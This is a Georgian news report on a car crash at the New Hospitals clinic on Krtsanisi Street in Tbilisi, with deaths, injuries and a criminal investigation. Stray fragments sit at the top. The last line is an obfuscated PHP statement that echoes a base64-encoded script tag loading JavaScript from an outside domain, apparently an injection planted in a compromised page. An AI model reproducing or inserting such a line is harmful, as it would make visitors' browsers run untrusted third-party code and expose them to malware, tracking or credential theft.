celsiusi
ავერსი შნაიდერი
კრწანისის ქუჩაზე, „ნიუ ჰოსპიტალსის ეზოში მომხდარი ავარიის შედეგად დაშავებული ადამიანებიდან კიდევ ერთი გარდაიცვალა. როგორც „ნიუ ჰოსპიტალსის“ დირექტორმა გიორგი რამიშვილმა განაცხადა, კლინიკაში შეყვანილი 5 ადამიანიდან ერთი გარდაიცვალა. ამასთან, ავარიის შედეგად ადგილზე დაიღუპა კიდევ ერთი ადამიანი.
 
„დაახლოებით 2 საათის წინ, ერთდროულად 5 ადამიანი იყო შემოყვანილი პოლიტრავმით, აქედან ერთი ადამიანი უმძიმესი პოლიტრავმით, გულის გაჩერებით, ჩატარებული რეანიმაციული ღონისძიებების მიუხედავად სიცოცხლესთან შეუთავსებელი დაზიანებებით გარდაცვალა. 4 ადამიანზე ახლა მიდის აქტიური მუშაობა“,-აღნიშნავს რამიშვილი.
 
მისივე ინფორმაციით, ზოგიერთი დაშავებულის ჯანმრთელობის მდგომარეობა მძიმეა, ზოგის კი საშუალო სიმძიმისაა.
 
ცნობისთვის, კრწანისის ქუჩაზე, ავარიის შედეგად რამდენიმე ადამიანი დაშავდა. მომხდარზე გამოძიება სისხლის სამართლის კოდექსის 276-ე მუხლით მიმდინარეობს, რაც ტრანსპორტის ექსპლუატაციისა და უსაფრთხოების წესების დარღვევას გულისხმობს.
1156
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");